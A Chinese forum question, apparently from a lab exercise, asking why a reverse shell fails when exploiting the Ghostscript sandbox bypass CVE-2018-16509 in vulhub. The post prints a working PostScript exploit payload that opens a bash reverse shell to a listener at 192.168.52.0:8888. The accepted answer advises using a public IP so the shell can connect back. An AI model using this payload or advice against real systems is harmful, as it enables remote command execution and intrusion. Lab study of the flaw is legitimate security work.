acvxd123 2022-09-12 11:03 采纳率: 64.1%
浏览 19
已结题

下面的代码改成反弹shell执行失败,怎么改?

我想要达到的结果

vulhub里面漏洞——GhostScript 沙箱绕过(命令执行)漏洞(CVE-2018-16509)
反弹不了,应该怎么改啊

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%exec("/bin/bash -i >& /dev/tcp/192.168.52.0/8888") > /tmp/nxx && cat /tmp/nxx) currentdevice putdeviceprops

  • 写回答

2条回答 默认 最新

  • ????27282 网络安全领域优质创作者 2022-09-17 09:07
    关注

    vulhub里面漏洞?
    你需要你个公网ip去做反弹,不然靶机找不到192.168.52.0 (内网)

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(1条)

报告相同问题?

问题事件

  • 系统已结题 9月27日
  • 已采纳回答 9月19日
  • 创建了问题 9月12日

悬赏问题

  • ¥15 安装svn网络有问题怎么办
  • ¥15 Python爬取指定微博话题下的内容,保存为txt
  • ¥15 vue2登录调用后端接口如何实现
  • ¥65 永磁型步进电机PID算法
  • ¥15 sqlite 附加(attach database)加密数据库时,返回26是什么原因呢?
  • ¥88 找成都本地经验丰富懂小程序开发的技术大咖
  • ¥15 如何处理复杂数据表格的除法运算
  • ¥15 如何用stc8h1k08的片子做485数据透传的功能?(关键词-串口)
  • ¥15 有兄弟姐妹会用word插图功能制作类似citespace的图片吗?
  • ¥15 latex怎么处理论文引理引用参考文献